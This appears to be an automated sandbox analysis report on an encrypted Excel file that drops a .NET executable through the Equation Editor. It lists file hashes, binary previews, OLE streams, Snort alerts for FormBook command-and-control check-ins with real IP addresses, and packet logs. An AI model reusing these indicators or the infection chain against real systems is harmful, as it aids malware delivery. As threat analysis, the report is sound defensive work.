Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75056775.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	3199944
Entropy (8bit):	1.0723406875580421
Encrypted:	false
SSDEEP:	6144:JFPAuIU4U9tVvfJHGCOd7FPAuIU4U9tVvfJHGCOd2:JmIvhGJd7mIvhGJd2
MD5:	4419315DEF025A089BDF3A5E556AEC7E
SHA1:	66C3C106879A9692FC60010AE6D5FCD68EF271AB
SHA-256:	3A9C525D24D8BE65C6B9D130AC603EB897FAAC656F1DF27E499489263563AB82
SHA-512:	7E4A69334F0E8ADF58DA02CA0D37EDBF38AE75B1EEDF72EB6D65AF6AF17F932EB53CF45186EBB8241210876649BB4561FE69C6C292801CDAFBEE08BB1E387091
Malicious:	false
Reputation:	low
Preview:	....l............................F...%.. EMF......0.........................8...X....................?......F...ti..hi..GDIC........JGDm....Pi.........4.....4...........................................4..A. ...................(....................h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4DE8BD0.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	high, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\Desktop\~$APPROVED.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1832960
Entropy (8bit):	7.369530849111079
Encrypted:	false
SSDEEP:	24576:Sv0H4JghFaUabDkakP0/ZeGPDWOlxm0Zx:Y4o/b5f/hR3m0
MD5:	92BD99870C4E2829F3E6D1B3B512067D
SHA1:	2DB671375AE170FF9B3E733FED98C2C7E7EF355A
SHA-256:	D69E95A9CA264C1547CDB2475244A145E79A321A58D35C2B2DD6183A032AAF16
SHA-512:	3A2FD22C948DD0A26B8971C9A907E6FC29AE1F5F32B1B6B23836D29C13E172D6D8C404F3BDFF976F8A20E28968D48A316E1437EB6EFC99FD03C581B44B08A984
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.`..............P.................. ... ....@.. .......................`............@.................................@...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................t.......H.......Tm..4............................................................0............(,...(-.........(.....o..........................(/......(0......(1......(2......(3....N..(....o!...(4....N..(....o....(5....&..(6.....s7........s8........s9........s:........s;............0...........~....o<....+...0...........~....o=....+...0...........~....o>....+...0...........~....o?....+...0...........~....o@....+..*.0..<........~.....(A.....,!r...p.....(B...oC...sD..........

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.992739860343387
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	APPROVED.xlsx
File size:	1101944
MD5:	09d492cf4937df0290af0be36ba30421
SHA1:	4ad8665febc2f0524d0b23c8f94d947e1a563e14
SHA256:	c0697b83e4d63f9a380466b91ba7db94e823b7a2fd137811bfcce5796a9b82f6
SHA512:	aa0cab4e5e13873823cd3f30d7cf35070a86171afe6df04e197d0c975c9ced993547a6a58b1d2e6d5de506262f8c19d9d65a1fdf3a8eb57a666706089285085d
SSDEEP:	24576:mX3rVzlf9/dZVT+8CzGYuUSUTsMYn+AX3rizKF/60wXnNkt:SVz7/dZVyT3XwV+O6nNkt
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "APPROVED.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	208
Entropy:	3.35153409046
Base64 Encoded:	False
Data ASCII:	l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
Data Raw:	6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1086072

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1086072
Entropy:	7.99980853948
Base64 Encoded:	True
Data ASCII:	c . . . . . . . . [ . . . f . . . . . . . g . 7 . . . y 6 ` . . . . . . . . . . . [ . . ' . . . . . . P ] 2 . \| . . . . f . . $ . 6 q b l . . X . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H
Data Raw:	63 92 10 00 00 00 00 00 c0 5b 09 f7 89 66 f1 ae de e9 a8 d0 9f 67 ec 37 bb 1b d0 79 36 60 f4 90 03 06 83 8b a4 c2 f7 03 06 5b c3 f1 27 f7 02 f2 aa ad a2 50 5d 32 90 7c 0c ee f0 1e 66 9b eb 24 a8 36 71 62 6c a9 8e 58 a3 e8 c3 3f 2c 94 33 48 c1 e6 fe f4 9c 90 c3 77 a3 e8 c3 3f 2c 94 33 48 c1 e6 fe f4 9c 90 c3 77 a3 e8 c3 3f 2c 94 33 48 c1 e6 fe f4 9c 90 c3 77 a3 e8 c3 3f 2c 94 33 48

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.69340331654
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . @ . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . e j X . . C . " ' . ^ . . . . . . . F M . W - . . a o P . . W . . . . . l . . . . . . . , ? v . . j \\ . . q . \\ . 1 . . f . . . y . .
Data Raw:	03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 40 dd b2 05 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/13/21-08:30:52.716889	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49169	23.227.38.74	192.168.2.22
05/13/21-08:31:03.737711	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49171	80	192.168.2.22	75.2.66.247
05/13/21-08:31:03.737711	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49171	80	192.168.2.22	75.2.66.247
05/13/21-08:31:03.737711	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49171	80	192.168.2.22	75.2.66.247

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 13, 2021 08:29:30.546329021 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:30.839442968 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:30.839543104 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:30.839982986 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:31.134192944 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.134229898 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.134257078 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.134257078 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:31.134273052 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:31.134284019 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.134290934 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:31.134316921 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:31.427437067 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.427473068 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.427488089 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.427504063 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.427524090 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.427544117 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.427565098 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.427599907 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.427714109 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:31.427731037 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:31.721514940 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721551895 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721564054 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721576929 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721587896 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721601009 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721616983 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721630096 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721642017 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721653938 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721668959 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721672058 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:31.721681118 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721698999 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:31.721705914 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:31.721730947 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:31.721751928 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:31.723664045 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.014962912 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015001059 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015027046 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015048027 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015072107 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015089989 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015100956 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015113115 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015125036 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015136957 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015151024 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015172958 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015188932 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015203953 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015214920 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015227079 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015238047 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015249014 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015259981 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015270948 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015283108 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.015288115 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.015321970 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.015345097 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.017878056 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308445930 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308471918 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308482885 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308495045 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308506966 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308517933 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308532000 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308543921 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308554888 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308567047 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308578968 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308589935 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308608055 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308619976 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308635950 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308649063 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308650970 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308666945 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308676004 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308681965 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308696985 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308711052 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308727026 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308746099 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308747053 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308758020 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308762074 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308763027 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308778048 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308794022 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308799028 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308809042 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308809996 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308823109 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308840036 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308842897 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308855057 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308862925 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308873892 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308891058 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308891058 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308907986 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308919907 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.308934927 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308957100 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.308989048 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.310245991 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602123976 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602175951 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602215052 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602253914 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602255106 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602292061 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602298021 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602312088 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602336884 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602343082 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602387905 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602421045 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602432013 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602453947 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602468967 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602484941 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602507114 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602545023 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602545977 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602567911 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602581978 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602611065 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602619886 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602646112 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602658033 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602672100 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602705956 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602720976 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602747917 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602785110 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602792025 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602813005 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602833033 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602854013 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602870941 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602885008 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602907896 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602937937 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602945089 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.602969885 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.602983952 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603003979 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603030920 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603050947 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603085995 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603178024 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603214979 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603260994 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603282928 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603291988 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603300095 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603334904 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603341103 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603374958 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603389978 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603396893 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603437901 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603478909 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603485107 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603491068 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603528023 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603558064 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603565931 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603584051 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:32.603604078 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:32.603621006 CEST	49167	80	192.168.2.22	3.36.53.50
